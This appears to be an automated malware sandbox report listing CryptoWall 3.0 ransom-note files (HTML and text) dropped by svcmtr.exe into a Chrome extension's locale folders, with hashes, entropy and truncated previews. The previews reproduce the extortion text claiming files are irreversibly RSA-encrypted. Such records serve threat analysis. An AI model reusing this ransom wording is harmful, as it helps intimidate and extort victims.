                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
